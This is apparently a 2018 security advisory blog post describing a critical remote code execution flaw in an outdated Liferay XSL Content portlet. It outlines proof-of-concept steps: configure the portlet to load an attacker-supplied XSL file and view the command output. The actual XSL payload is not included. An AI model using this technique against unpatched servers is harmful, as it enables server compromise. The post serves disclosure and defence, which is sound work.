Liferay 2: Users in your system could execute arbitrary code on your server

28 February 2018

The vulnerability in this article has been corrected in the Liferay's current, latest version. We consider it extremely important to keep the used system up-to-date. The following article shows an example of a vulnerability in an outdated Liferay version.

The following example shows how a malicious user could compromise your server. This example requires a user to be logged in, but in other cases no login is required to run arbitrary code with the rights of the operating system user behind your portal instance. If you would like to secure your system, contact us.

XSL content portlet configuration (RCE)

Level of security risk: Critical

Details:
The XSL Content portlet allows anyone who has permission to configure the portlet to specify any XML/XSL file.
More details:
https://issues.liferay.com/browse/LPS-58018
https://issues.liferay.com/browse/LPE-4194
https://www.owasp.org/images/a/ae/OWASP_Switzerland_Meeting_2015-06-17_XSLT_SSRF_ENG.pdf

Risk:
An attacker could run arbitrary code on the server, hence gaining access to the server itself.

Proof of concept:

1. Add the XSL content portlet to a page:

2. Select Options/Configuration:

3. Change the URL to the URL of a custom XSL:

The content of the XSL file is the following:

4. After saving the changes, the portlet displays the result of the given command: